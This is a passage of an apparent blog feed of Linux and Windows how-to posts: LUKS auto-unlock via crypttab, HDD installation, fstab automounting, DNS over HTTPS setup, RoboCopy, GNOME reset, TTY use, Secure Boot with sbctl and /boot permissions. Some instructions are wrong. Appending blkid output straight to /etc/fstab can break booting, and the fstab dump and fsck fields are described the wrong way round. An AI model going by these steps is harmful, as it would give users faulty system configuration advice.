Add the UUID and related content to the `crypttab`. This file is crucial for loading the key during the system boot-up without requiring a passphrase.

```shell
nvim /etc/crypttab

4tbhdd          /dev/disk/by-uuid/&lt;uuid-of-luks&gt;  /root/keyfile   luks
```

The `crypttab` entry you provided essentially automates the process of unlocking and mapping the LUKS-encrypted device during the system boot. The entry specifies the necessary details, such as the device path, the keyfile, and the desired mapping name (`4tbhdd`). This way, you don&apos;t need to manually run the `cryptsetup luksOpen` command during each boot.

Here&apos;s the breakdown:

- The system reads the `/etc/crypttab` file during the boot process.
- It identifies the `4tbhdd` entry.
- It automatically runs a command similar to this:

```bash
cryptsetup luksOpen /dev/disk/by-uuid/&lt;UUID&gt; 4tbhdd --key-file /root/keyfile
```

- The LUKS-encrypted device is then mapped to `/dev/mapper/4tbhdd`, and you can access it using this mapped device name.

This automation is convenient for managing encrypted devices, especially when dealing with multiple LUKS-encrypted partitions or disks. It simplifies the process of unlocking and mapping during system startup.

## Step 12: Get the UUID of mapper

Copy the UUID of the mapper for further use:

```shell
blkid /dev/mapper/4tbhdd &gt;&gt; /etc/fstab
```

### Add to fstab

Edit the `/etc/fstab` file and add an entry for mounting the mapper during system boot-up:

```shell
nvim /etc/fstab

# /dev/mapper/4tbhdd 4TB HDD
UUID=&lt;UUID-of-mapper&gt;  /mnt/4tbhdd     btrfs       defaults        0 0
```

Explanation:

- The `blkid` command is used to retrieve the UUID of the mapper (`4tbhdd`).
- The obtained UUID is then appended to the `/etc/fstab` file, ensuring that the mapper is mounted automatically during the system boot-up.

## Step 14: Create Mounting Point

Since we are targeting the mount point `/mnt/4tbhdd`, let&apos;s create this directory using the following command:

```shell
mkdir /mnt/4tbhdd
```

This directory will serve as the mount point for our encrypted internal disk.

## Step 15: Adjusting Permissions

Because the permissions are set to root only, use `chown` to allow a regular user to perform any action.

```shell
chown user:group /mnt/4tbhdd/
```

## Step 16: Reboot

Now, reboot your system. After the reboot, you should notice that you are not required to enter any passphrase manually. Use the `lsblk` command to verify that your encrypted internal disk has been successfully mounted:

```shell
lsblk
NAME           MAJ:MIN RM   SIZE RO TYPE  MOUNTPOINTS
sda              8:0    0   3.6T  0 disk
└─sda1           8:1    0   3.6T  0 part
  └─4tbhdd     254:4    0   3.6T  0 crypt /mnt/4tbhdd
```

Your internal disk, named `4tbhdd`, is now mounted at `/mnt/4tbhdd` and is automatically decrypted during the boot process.

## Step 17: Double Verify Status

To double-check the status of the encrypted device, you can use the `cryptsetup status` command. This will provide detailed information about the LUKS device:

```shell
cryptsetup status /dev/mapper/4tbhdd
```

The output should confirm that `/dev/mapper/4tbhdd` is active, and it is in read/write mode.

## Conclusion

Congratulations! You&apos;ve successfully encrypted and set up an internal disk for decryption using a keyfile alongside a passphrase. This adds an extra layer of security to your storage solution. Remember to store your keyfile securely and keep it accessible to ensure smooth disk decryption.

## References

- [How to encrypt a drive and mount it automatically at boot / no prompt](https://onion.tube/watch?v=UXJrSji-nNo)
- [How to automatically mount an encrypted volume at boot?](https://discussion.fedoraproject.org/t/how-to-automatically-mount-an-encrypted-volume-at-boot/71271/1)
- [How to add a passphrase, key, or keyfile to an existing LUKS device](https://access.redhat.com/solutions/230993)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Upgrading My Computer with a New HDD!</title><link>https://ummit.dev//posts/hardware/harddisk/upgrading-my-computer-with-a-new-hdd-a-beginners-guide/</link><guid isPermaLink="true">https://ummit.dev//posts/hardware/harddisk/upgrading-my-computer-with-a-new-hdd-a-beginners-guide/</guid><description>Beginner-friendly guide to physically installing and setting up a new hard disk drive in your computer.</description><pubDate>Thu, 07 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

I recently decided to upgrade my computer by adding a new HDD. This was a significant step for me as I hadn&apos;t worked much with hardware before and hadn&apos;t installed any HDD in my computer.

&gt;`(&quot;Toshiba Enterprise Series MG08ADA400N 4TB 7200rpm 256MB 3.5&quot;)`

![New HDD](./featured.webp)

## Why Upgrade?

Initially, I hesitated due to concerns about storage space, but with the increasing number of virtual machines on my computer, especially after the GPU passthrough, I finally decided to invest in a new HDD. Today, I purchased a 4TB HDD, and I&apos;m excited to share my experience of installing hardware for the first time.

## How to Install the HDD: A Beginner&apos;s Guide

Having watched several YouTube videos that weren&apos;t beginner-friendly, I sought advice from the online community. The entire process took around 5 hours, and I learned valuable lessons on how to install an HDD.

### Step 1: Get Ready

Remove the left and right side plates from the computer case. Identify the HDD socket on the motherboard, the motherboard SATA socket, and the power supply unit socket.

![Port](https://pcguide101.com/wp-content/uploads/2021/07/hard-drive-ports-connections.jpeg)

![HDD Port](https://images.easytechjunkie.com/sata-cable-connected-to-a-drive.jpg)

### Step 2: Find the Cables

You&apos;ll need two cables for the installation—usually found in the motherboard and power supply boxes.

#### Power Supply Unit Cable

This cable supplies power to the HDD.

![PSU](https://ae01.alicdn.com/kf/HLB1JJ26XvLsK1Rjy0Fbq6xSEXXaX/PCIe-6Pin-Male-to-2-3-4-SATA-Power-Supply-Cable-for-Seasonic-Focus-Plus-Platinum.jpg)

#### SATA Cable

This cable is for data transfer.

![SATA Cable](https://pactech-inc.com/wp-content/uploads/2014/06/SATA2K-XXL-Amphenol-SATA-Cable-Straight-with-Latch-to-Left-Angle-003.jpg)

### Step 3: Plug in the Cables

Ensure the power supply unit and SATA cables are plugged in correctly. Connect the power supply unit cable to the corresponding port on your PSU, and connect the SATA cable to one of the SATA 3-5 ports on the motherboard.

![SATA-Destination](https://pcguide101.com/wp-content/uploads/2021/06/SATA-2-700x525.jpeg)

![PSU-Destination](https://pbs-prod.linustechtips.com/monthly_2021_08/1117139249_Corsairpsu.png.45d19ada31b0572c874aebba2a36f041.png)

### Step 4: Test the HDD

Reconnect all cables (PSU, HDMI, USB, keyboard, etc.), turn on your computer, and check if the HDD is correctly displayed using the `lsblk` command in the terminal.

```shell
❯ lsblk
NAME           MAJ:MIN RM   SIZE RO TYPE  MOUNTPOINTS
sda              8:0    0   3.6T  0 disk &lt;- This is my new HDD
```

### Step 5: Secure the HDD

Ensure the HDD is correctly placed in the rack inside the computer case. Lock the HDD rack securely.

## Conclusion

This beginner&apos;s guide aims to simplify the process of installing an HDD for those, like me, who are new to hardware upgrades. With your new HDD successfully installed, you&apos;ll have expanded storage and improved capabilities for your computer.

## Reference

- [What Does a SATA Port Look Like?](https://pcguide101.com/motherboard/what-does-a-sata-port-look-like/)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Mounting Your Internal Disk on your Linux System</title><link>https://ummit.dev//posts/linux/system/harddisk/mounting-your-internal-disk-on-your-linux-system/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/system/harddisk/mounting-your-internal-disk-on-your-linux-system/</guid><description>Configure automatic mounting of internal hard drives on Linux using fstab and proper filesystem setup.</description><pubDate>Thu, 07 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

In the previous article, I showed you how to physically install a hard disk in your computer. Now, in this article, I&apos;ll guide you through the process of automounting the hard disk on your Linux system, making it accessible and ready to use with just a few simple commands.

## Step 1: Switch to Root User

Since the operations require root permissions, switch to the root user without using `sudo`:

```shell
su
```

## Step 2: Create GPT Table and File System

Linux requires a GPT table for disks. Use `gdisk` to create the GPT table and format the file system. First, identify your disk name with `lsblk` or `blkid`.

```shell
gdisk /dev/sda
o
y
n
enter
enter
enter
enter
p (ensure the file system is correct)
w
y
```

## Step 3: Format the Disk and Choose File System Type

I prefer Btrfs for my disk type. Type:

```shell
mkfs.btrfs /dev/sda1
```

If you encounter an error indicating existing data, use the `-f` option to overwrite the `/dev/sda`.

```shell
mkfs.btrfs -f /dev/sda1
```

## Step 4: Create Your Mount Source Path

Set a path for your files directory. Typically, mounting to the `/mnt/*` path is common.

```shell
mkdir /mnt/4tbhdd
```

## Step 5: Mounting the Disk

Mounting the disk can be done temporarily or set up for automount.

### Temporarily

For temporary mounting (until the system shutdown):

```shell
mount -t btrfs /dev/sda1 /mnt/4tbhdd/
```

### Auto-mount

1. Identify your file system UUID using `blkid`.

```shell
blkid /dev/sda1
```

2. Copy the UUID value and use your preferred text editor to add the following line to `/etc/fstab`:

```shell
❯ nvim /etc/fstab

UUID=&lt;uuid-of-btrfs-file-system&gt;   /mnt/4tbhdd   btrfs   defaults  0   2
```

Explanation of the fields:

- `UUID=&lt;uuid-of-btrfs-file-system&gt;`: Replace the actual UUID of your Btrfs file system.

- `/mnt/4tbhdd`: This is the mount point where the Btrfs file system will be mounted. Ensure that the mount point exists before attempting to mount.

- `btrfs`: Specifies the file system type. In this case, it&apos;s Btrfs.

- `defaults`: This field includes default mount options. You can customize this field based on your specific needs, but `defaults` typically includes commonly used options.

- `0`: This field is used by `fsck` to determine the order in which filesystem checks are done at boot time. A value of `0` means that the file system is not checked.

- `2`: This field is used by `dump` to determine the order in which filesystem backups are done at boot time. A value of `2` means that the file system is backed up.

After adding this entry to your `/etc/fstab` file, you can either reboot your system to apply the changes or manually mount the file system using the `mount -a` command.

### Verify the Mounting

A Simple way, back to your directory `/mnt/4tbhdd`, and you should see your hard disk has been mounted. Right-click the directory and verify the free space (`4.0 TB Free`).

![done](./done.png)

## Step 6: Adjusting Permissions

After successfully auto-mounting the disk, you might notice that the ownership is restricted to the root user. This means you cannot use a regular user to create directories or manipulate files on the mounted disk. To address this, use the `chown` command to set permissions, allowing your user and group to access all items:

```shell
sudo chown user:group /mnt/4tbhdd
```

Replace `user` and `group` with your actual username and group. This adjustment ensures that you, as a regular user, have the necessary permissions to interact with the mounted disk.

## Conclusion

Automounting your hard disk on Linux ensures convenient access to your storage space without manual intervention. This process allows you to seamlessly integrate additional storage capacity into your system.

## References

- [How to mount disk and partition in Linux](https://www.simplified.guide/linux/disk-mount)
- [How To Automount File Systems on Linux](https://www.linuxbabe.com/desktop-linux/how-to-automount-file-systems-on-linux)
- [mount: wrong fs type, bad option, bad superblock](https://unix.stackexchange.com/questions/315063/mount-wrong-fs-type-bad-option-bad-superblock)
- [How to Mount a Hard Drive in Linux on Startup](https://onion.tube/watch?v=JS0Jd_DNXdg)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Configuring DNS Over HTTPS (DoH) on your system</title><link>https://ummit.dev//posts/infosec/doh-enable-any-system/</link><guid isPermaLink="true">https://ummit.dev//posts/infosec/doh-enable-any-system/</guid><description>This step-by-step guide ensures encrypted DNS traffic with DoH</description><pubDate>Mon, 27 Nov 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Securing your DNS (Domain Name System) queries is an essential step in enhancing your online privacy. DNS Over HTTPS (DoH) encrypts your DNS traffic, preventing potential eavesdropping and manipulation. This guide walks you through configuring DoH on any system, such as linux, windows and android.

A simpler explanation is shown in the following diagram:

![DoH](./featured.webp)

## Browser DNS Over HTTPS?

Like Firefox based or chromium based browsers also have an option called &quot;DNS Over HTTPS&quot;, but this will be set to global in this guide, which means that there is no need to set this option to browser, as all web dns are provided by system dns. Not just the browser dns.

### DNS Over HTTPS Provider

First of all, you need to find a DNS Over HTTPS (DoH) server provider, I recommend [Mullvad DoH](https://mullvad.net/en/help/dns-over-https-and-dns-over-tls). Otherwise this step is just different with the hostname and IP. You can use like IVPN, AdGuard, Google, Cloudflare, NextDNS and others.

### Mulvad DoH: Which one good for you?

It depends on your needs, in my case I would use base, honestly I want to watch porn. I&apos;ve tested using all and I can&apos;t access most porn sites. But if you don&apos;t need it, use all.

Then if you only need the DoH functionality, just use dns hahahaha.
&gt;dns.mullvad.net

| Hostname                   | IPV4          | Ads   | Trackers   | Malware   | Adult   | Gambling   | Social media   |
|--------------------------  |-------------  |-----  |----------  |---------  |-------  |----------  |--------------  |
| dns.mullvad.net            | 194.242.2.2   |       |            |           |         |            |                |
| adblock.dns.mullvad.net    | 194.242.2.3   | ✅     | ✅          |           |         |            |                |
| base.dns.mullvad.net       | 194.242.2.4   | ✅     | ✅          | ✅         |         |            |                |
| extended.dns.mullvad.net   | 194.242.2.5   | ✅     | ✅          | ✅         |         |            | ✅              |
| all.dns.mullvad.net        | 194.242.2.9   | ✅     | ✅          | ✅         | ✅       | ✅          | ✅              |

For the github repository see:

{{&lt; github repo=&quot;mullvad/dns-blocklists&quot; &gt;}}

## Step-by-Step Guide on Linux (systemd)

{{&lt; alert &gt;}}
This steps only works on a systemd init based Linux system. such as arch linux.
{{&lt; /alert &gt;}}

1. **Enable systemd-resolved and start:**

   Open a Terminal and ensure that systemd-resolved is enabled and start:
   ```bash
   sudo systemctl enable systemd-resolved
   sudo systemctl start systemd-resolved
   ```

2. **Edit systemd-resolved Configuration:**

   Edit the systemd-resolved configuration file with your preferred text editor:
   ```bash
   sudo nano /etc/systemd/resolved.conf
   ```

4. **Add DoH Servers:**

   In the opened file, add the following lines at the bottom under [Resolve]. Uncomment (remove #) the line corresponding to your preferred DNS server option:
   ```ini
   DNS=194.242.2.4 #base.dns.mullvad.net
   DNSSEC=yes
   DNSOverTLS=yes
   Domains=~.
   ```

   &gt;Note: If you are currently using VPN of your system. `DNSOverTLS` should not be used as `yes`, set this to `opportunistic`. If it is set to  `yes`, you won&apos;t  able to use network.

   &gt;Note: Enabling DNSSEC is optional, but it may cause issues with websites having incorrect DNSSEC information.

5. **Save and Exit:**

   Save the file by pressing `Ctrl + O` and then `Enter`, and then exit with `Ctrl + X`.

6. **Create Symbolic Link:**

   Create a symbolic link to the file using the following command in the Terminal:
   ```bash
   sudo ln -sf /run/systemd/resolve/stub-resolv.conf /etc/resolv.conf
   ```

7. **Restart systemd-resolved:**

   Restart systemd-resolved to apply the changes:
   ```bash
   sudo systemctl restart systemd-resolved
   ```

8. **Restart NetworkManager:**

   Restart NetworkManager for the changes to take effect:
   ```bash
   sudo systemctl restart NetworkManager
   ```

9. **Restart dhcpcd:**

    Restart dhcpcd for the changes to ensure take effect:
    ```shell
    sudo systemctl restart dhcpcd
    ```

9. **Verify DNS Settings:**

   Verify the DNS settings with:
   ```bash
   resolvectl status
   ```

   You should see `Current DNS Server:` output is your input IP.

11. **Test ping response:**

    If your setup is fine, try pinging any website and you should get a response.
    ```shell
    ping gentoo.org
    ```

12. **Test Mullvad DoH works well:**

    For Mullvad, refer to the [official Mullvad website](https://mullvad.net/en/check) to perform a check. Otherwise, use this command:
    ```
    resolvectl query gentoo.org
    ```

    the output should said:

    ```shell
    Data was acquired via local or encrypted transport: yes
    ```

## Step-by-step instructions on Windows

On Windows, you do not need to use the command line to complete the process. Windows already has a GUI for this process.

1. **Accessing Settings:**
Open the Settings menu on your Windows system.
   ![Settings](./win11/Setting open.png)

2. **Navigating to Network &amp; Internet Settings:**
In the Settings menu, locate and click on `Network &amp; Internet.`
     ![Network &amp; Internet](./win11/Setting-network.png)

3. **Selecting Your Network:**
Under `Network &amp; Internet`, choose your preferred network, typically labeled as Ethernet for wired connections.
     ![Ethernet](./win11/Ethernet.png)

4. **Editing DNS Settings:**
Click on the `Edit` option for IP settings, specifically focusing on the IPv4 DNS Server.
     ![Edit](./win11/Edit-all.png)

5. **Switching to Manual DNS Configuration:**
Change the DNS configuration from `Automatic` to `Manual.`
     ![Manual](./win11/Manual.png)

6. **Setting Preferred DNS:**
Update the &quot;Preferred DNS&quot; section with your chosen DNS address. For Windows, use one of the following Mullvad DoH addresses:
     - 194.242.2.2 - [dns.mullvad.net/dns-query](https://dns.mullvad.net/dns-query)
     - 194.242.2.3 - [adblock.dns.mullvad.net/dns-query](https://adblock.dns.mullvad.net/dns-query)
     - 194.242.2.4 - [base.dns.mullvad.net/dns-query](https://base.dns.mullvad.net/dns-query)
     - 194.242.2.5 - [extended.dns.mullvad.net/dns-query](https://extended.dns.mullvad.net/dns-query)
     - 194.242.2.9 - [all.dns.mullvad.net/dns-query](https://all.dns.mullvad.net/dns-query)

7. **Activating DNS Over HTTPS:**
Enable the DNS over HTTPS option.

8. **Saving Changes and Adding Alternate DNS:**
Save your changes. Optionally, you can add an `Alternate DNS` using a different address for redundancy.
     ![edit-all](./win11/example.png)

9. **Confirming Encryption:**
After editing, ensure that the &quot;IPv4 DNS Server&quot; displays as `encrypted.`
     ![done](./win11/Done.png)

10. **Verification:**
Check the DNS status on [Mullvad DNS](https://mullvad.net/en/check) to confirm that your DNS results are no leaked.

## Step-by-step guide for Android

Android is easier. Also has a GUI for it.

1. Start `Settings` and click on `Connections`:

![Settings](./android/Settings.png)

2. In `Connections` click on `More Connection Settings`.

![More Connection Settings](./android/More Connection Settings.png)

3. Click `Private DNS`, default is `Automatic`.

![Private DNS](./android/Private DNS.png)

4. Enter your preferred hostname. In this case I will use `base.dns.mullvad.net`.

![Enter hostname](./android/Enter host name.png)

## Conclusion

By following these steps, you&apos;ve configured DNS Over HTTPS using systemd-resolved on your system, enhancing your privacy and securing your DNS queries. If you encounter issues, try the opportunistic DoH setting or experiment with different DNS server options.

## References

- [DNS over HTTPS and DNS over TLS](https://mullvad.net/en/help/dns-over-https-and-dns-over-tls)
- [What Is DNS-Over-HTTPS And How To Enable It On Your Device (Or Browser)](https://www.itechtics.com/dns-over-https/)
- [DNS over TLS with systemd-resolved](https://askubuntu.com/questions/1092498/dns-over-tls-with-systemd-resolved)
- [Guide on how to enable dot (dns over tls) on systemd-resolved.](https://www.reddit.com/r/linux/comments/us0h00/guide_on_how_to_enable_dot_dns_over_tls_on/)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>File Management with RoboCopy</title><link>https://ummit.dev//posts/windows/terminal/robocopy/</link><guid isPermaLink="true">https://ummit.dev//posts/windows/terminal/robocopy/</guid><description>Master Windows RoboCopy for efficient multi-threaded file copying, moving, and backup operations with advanced filtering.</description><pubDate>Sat, 18 Nov 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

RoboCopy, short for Robust File Copy, is a powerful multi-threaded file management tool in Windows. Its efficiency makes it several times faster than traditional copy-paste methods.

## Why RoboCopy?

Managing a large number of files often requires organization, classification, and backups. However, dealing with unnecessary files during backups can be time-consuming. This is where RoboCopy comes to the rescue, providing a swift and efficient solution.

## Command Structure

### Format
```bat
robocopy &lt;source_location&gt; &lt;destination_location&gt; &quot;&lt;file_filter&gt;&quot; &quot;&lt;arguments&gt;&quot;
```

### Basic Demonstration

The following basic demonstration copies all PNG files from the &quot;Server&quot; location to &quot;Server assets/yoyo&quot;:

```bat
robocopy Server &quot;Server assets/yoyo&quot; *.png
```

### Demonstration with Arguments

Here, we use additional arguments to perform more advanced operations, including purging, copying subfolders, and excluding files:

```bat
robocopy Server &quot;Server assets/yoyo&quot; *.png /PURGE /S
```

### Copying Across Disks

This example illustrates copying HTML files from folder1 on drive D to folder2 on drive E:

```bat
robocopy d:folder1 e:folder2 *.html
```

## Practical Parameters

### Folder Parameters

- `/XD`: Exclude Folder
- `/PURGE`: Remove files and folders not present in the source
- `/S`: Copy subfolders (required for folder copying)
- `/MOVE`: Move folders (equivalent to moving files)
- `/E`: Copy empty folders

### Files Parameters

- `/XF`: Exclude files
- `/PURGE`: Remove files not present in the source
- `/MOV`: Move files
- `/MOVE`: Move folders (equivalent to moving files)

Mastering these parameters empowers you to tailor RoboCopy to your specific file management needs, offering unparalleled efficiency and flexibility.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>A Quick Guide for Resetting GNOME ALL Settings</title><link>https://ummit.dev//posts/linux/desktop-environment/gnome/gnome-reset/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/desktop-environment/gnome/gnome-reset/</guid><description>Explore this quick guide to learn how to effortlessly reset all your GNOME settings using a simple terminal command, restoring your Linux desktop to its default configurations in no time</description><pubDate>Sat, 18 Nov 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Customizing your GNOME desktop environment on Linux can lead to various tweaks and adjustments. However, there may come a time when you want to revert all your GNOME settings to their default configurations. In such cases, the `dconf reset` command is your go-to solution. This quick guide will walk you through the simple steps to reset all your GNOME settings effortlessly.

### Why?

I have previously used Gnome for a long time, but I wanted to explore KDE and use multiple desktop environments with it. However, after installing KDE, I encountered issues with broken fonts which affected the display. I attempted to reset the fonts, but it was unsuccessful. I tried resetting my fonts, but it didn&apos;t work. In the end, resetting all the settings on Gnome fixed the issues. Follow these steps to reset the settings.

## Step 1: Open the Terminal

Begin by opening your terminal. You can do this by pressing `Ctrl + Alt + T` or using the application launcher.

## Step 2: Run the Reset Command

Enter the following command in the terminal:

```bash
dconf reset -f /org/gnome/
```

This command will reset all settings under the `/org/gnome/` path.

## Step 3: Confirm the Reset

After executing the command, there won&apos;t be any confirmation message. The reset happens instantly. You can now close the terminal.

## Conclusion

Whether you want a fresh start or need to troubleshoot issues related to your GNOME settings, the `dconf reset` command simplifies the process.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Linux TTY Guide</title><link>https://ummit.dev//posts/linux/tools/terminal/terminal-tty/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/terminal/terminal-tty/</guid><description>Explore the power of the Linux terminal with this comprehensive guide to TTY (teletypewriter) sessions. Learn how to navigate between virtual terminals, manage multiple sessions, troubleshoot graphical interface issues.</description><pubDate>Sat, 18 Nov 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

If you&apos;re a Linux user, you might find yourself in situations where the graphical interface becomes unresponsive or inaccessible. In such cases, the Linux terminal, accessed through TTY (teletypewriter) sessions, becomes a valuable tool. Here&apos;s a guide on how to use TTY for terminal navigation.

### Accessing TTY

To access TTY, use the key combination `Ctrl + Alt + F1` for the first virtual terminal. For additional virtual terminals, you can use `Ctrl + Alt + F2`, `Ctrl + Alt + F3`, and so on, up to `Ctrl + Alt + F6` or more, depending on your system configuration.

### Terminal Sessions

Each virtual terminal represents a separate terminal session. You can have multiple TTY sessions running concurrently, and each session operates independently. To switch between sessions, use the respective `Ctrl + Alt + F` key combination.

### Logging In

Once you access a TTY session, you&apos;ll be prompted to log in with your username and password. After successful authentication, you&apos;ll have a command-line interface to interact with your Linux system.

### Switching TTY

Use `Alt` + `left` and `right` arrow keys to quickly switch between tty sessions.

### Exiting TTY

To exit a TTY session, ensure you&apos;ve logged out of the session by typing `exit` or `logout` and pressing Enter. After logging out, you can switch back to the graphical interface using `Ctrl + Alt + F7` or the corresponding key combination for your system.

### TTY for Troubleshooting

TTY becomes particularly useful when you encounter issues with the graphical interface. If your desktop environment is unresponsive, switching to a TTY session allows you to troubleshoot and potentially resolve issues through the command line.

### Managing Multiple Sessions

While in a TTY session, you can have multiple TTY sessions open simultaneously. This is useful for multitasking and running different commands in parallel. To switch between open sessions, use the `Ctrl + Alt + F` key combination corresponding to the desired session.

### Conclusion

TTY sessions provide a powerful and efficient way to interact with your Linux system through the terminal. Whether you need to troubleshoot graphical interface issues or prefer a command-line environment, TTY offers flexibility and control. Experiment with TTY sessions to become more adept at navigating and managing your Linux system from the terminal.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Adding Secure Boot with Your Self-Certified Keys with Linux</title><link>https://ummit.dev//posts/linux/system/uefi/secure-boot/how-to-enable-secure-boot-with-self-cert/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/system/uefi/secure-boot/how-to-enable-secure-boot-with-self-cert/</guid><description>Unlock the full potential of your Linux system by enabling Secure Boot with your own self-certified keys. This step-by-step guide walks you through the process, ensuring a secure and seamless boot experience.</description><pubDate>Tue, 07 Nov 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

For a Linux user pursuing a secure system, it is imperative to enable Secure Boot. Nonetheless, merely turning it on does not guarantee a smooth boot. Signing a key on the Linux device is necessary to attain this. Failing to complete this important step will cease access to the Linux system. In this guide, I will lead you through the key signing process on your Linux machine. This essential step guarantees a smooth start-up for your Linux system and takes your Linux device to the next level of security.

## Preparation

Before signing a key in the BIOS, there are some necessary steps you must do.

### 1. CSM Support

The options to disable and enable Secure Boot are only available when your CSM options are disabled. Therefore, the Secure Boot options will be hidden. So just makesure this CSM Options is disabled.

&gt;Note: The CSM options are a feature that allows your system to load up legacy BIOS.

As our system always utilizes UEFI, it is time to bid farewell to the legacy BIOS. Simply disable it.

![CSM Support](https://www.technewstoday.com/wp-content/uploads/2023/07/csm-support-disabled-enabled-gigabyte.jpg)

### Secure Boot Mode

Now, navigate to the Secure Boot mode and modify the setting from Standard to Custom. Just make sure this is on a Setup mode. (Custom)

![Seucre Boot mode](https://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1002061/11883f1.png)

### Delete Existing keys

Now you have to delete all the existing keys with this setting. Some BIOS systems allow for a simple one-click reset of all the keys.

![Existing keys delete](https://www.isunshare.com/images/article/windows-password/enable-disable-secure-boot-in-uefi-bios/clear-secure-boot-keys-in-asus.png)

### Factory Default keys

The factory default keys are no longer required and should therefore be disabled as we will be using our own key for the sign key.

![Factory-Default-keys.png](./Factory-Default-keys.png)

Now, Save the changes and Boot-up your system.

##  What is  `sbctl`?

Sbctl is intended to be a user-friendly secure boot key manager that can set up secure boot, provide key management capabilities, and track files that need to be signed in the boot chain.

The program is coded completely in Golang, with go-uefi for the API layer, and does not depend on existing secure boot tooling.

### Install `sbctl`

Install it now using your package manager:

```shell
sudo pacman -S sbctl
```

### 1. Create Keys

Generate new Secure Boot keys using the following command:

```shell
sudo sbctl create-keys
```

### 2. Enroll Keys

Enroll the newly created keys into the Secure Boot settings:

```shell
sudo sbctl enroll-keys
```

### 3. Sign EFI Images

Identify EFI images that need signing (e.g., `BOOTX64.EFI`, `systemd-bootx64.efi`, `vmlinuz-linux`). Sign each image using `sbctl sign`:

```shell
sudo sbctl sign -s /boot/EFI/BOOT/BOOTX64.EFI
sudo sbctl sign -s /boot/EFI/systemd/systemd-bootx64.efi
sudo sbctl sign -s /boot/vmlinuz-linux
```

### 4. Verify Signed Keys

Use this command to verify that the keys were successfully signed or that existing keys are available on your system:

```shell
sudo sbctl verify
```

### 5. Enable Secure Boot

Now, Reboot your System and Return to BIOS, enable Secure Boot, and again reboot your system!

## Verification

There are several methods available to confirm if your system has enabled secure boot. Let us explore how to check and ensure system security.

### 1. Using bootctl

As I use the systemd init system, it is always beneficial to utilize bootctl for system initialization. To view the commands, simply enter `bootctl` for an immediate result.

```shell
$ bootctl

System:
      Firmware: UEFI 2.80 (American Megatrends 5.27)
 Firmware Arch: x64
   Secure Boot: enabled (user)
  TPM2 Support: yes
  Boot into FW: supported

Current Boot Loader:
      Product: systemd-boot 254.5-1-arch
     Features: ✓ Boot counting
               ✓ Menu timeout control
               ✓ One-shot menu timeout control
               ✓ Default entry control
               ✓ One-shot entry control
               ✓ Support for XBOOTLDR partition
               ✓ Support for passing random seed to OS
               ✓ Load drop-in drivers
               ✓ Support Type #1 sort-key field
               ✓ Support @saved pseudo-entry
               ✓ Support Type #1 devicetree field
               ✓ Enroll SecureBoot keys
               ✓ Retain SHIM protocols
               ✓ Boot loader sets ESP information
          ESP: /dev/disk/by-partuuid/xxxxxxx-xxxxxxxxxx-xxxxxxxxxxx
         File: └─/EFI/systemd/systemd-bootx64.efi
```

Basically, you can see all the things with this `bootctl` command, you can see the result is `Secure Boot: enabled (user)`, that mean was successful.

### 2. Using sbctl

Also, `sbctl` has a mini function that can display the status of your secure boot.

```shell
$ sbctl status

Installed:          ✓ sbctl is installed
Owner GUID:  xxxxxxxxx-xxxxxxx-xxxxxxxx-xxxx
Setup Mode:     ✓ Disabled
Secure Boot:  ✓ Enabled
Vendor Keys:  microsoft
```

If all the results display `✓`, then it means you are good!

## Conclusion

By following these steps, you&apos;ve securely enabled Secure Boot with your self-certified keys, allowing your system to boot only trusted software, enhancing its overall security.

## References

- [Reddit: Simple way to set up Secure Boot? ](https://www.reddit.com/r/archlinux/comments/ji0be6/simple_way_to_set_up_secure_boot/)
- [Arch wiki: User:Krin/Secure Boot, full disk encryption, and TPM2 unlocking install](https://wiki.archlinux.org/title/User:Krin/Secure_Boot,_full_disk_encryption,_and_TPM2_unlocking_install)
- [Install Secure Boot on Arch Linux (the easy way)](https://onion.tube/watch?v=yU-SE7QX6WQ)
- [Setting Up Secure Boot on Arch Linux Using sbctl](https://onion.tube/watch?v=R5dUWnSQIuY)
- [Github: sbctl](https://github.com/Foxboron/sbctl)
- [How to Enable Secure Boot in Bios Gigabyte✅](https://onion.tube/watch?v=waCl06Mg02E)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Fixing Security Vulnerabilities in systemd-boot /boot</title><link>https://ummit.dev//posts/linux/tools/boot-loader/systemd-boot/bootctl-warning-permission-fix/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/boot-loader/systemd-boot/bootctl-warning-permission-fix/</guid><description>Learn how to enhance your Linux system&apos;s security by fixing vulnerabilities in systemd-boot /boot</description><pubDate>Tue, 07 Nov 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Your bootloader should not have access granted to ordinary users. If your regular user is also capable of reading `/boot` or `/efi`, then it is recommended to prevent access. So, do it with few commands!

```shell
Copied &quot;/usr/lib/systemd/boot/efi/systemd-bootx64.efi&quot; to &quot;/efi/EFI/systemd/systemd-bootx64.efi&quot;.
Copied &quot;/usr/lib/systemd/boot/efi/systemd-bootx64.efi&quot; to &quot;/efi/EFI/BOOT/BOOTX64.EFI&quot;.
⚠️ Mount point &apos;/efi&apos; which backs the random seed file is world accessible, which is a security hole! ⚠️
⚠️ Random seed file &apos;/efi/loader/random-seed&apos; is world accessible, which is a security hole! ⚠️
Random seed file /efi/loader/random-seed successfully refreshed (32 bytes).
Created EFI boot entry &quot;Linux Boot Manager&quot;.
```

## What&apos;s problem?

The problem with your `/boot` directory is that normal user can access it. One concern is that even though normal users cannot edit the directory, but still can see the `/boot` path without requiring root access.

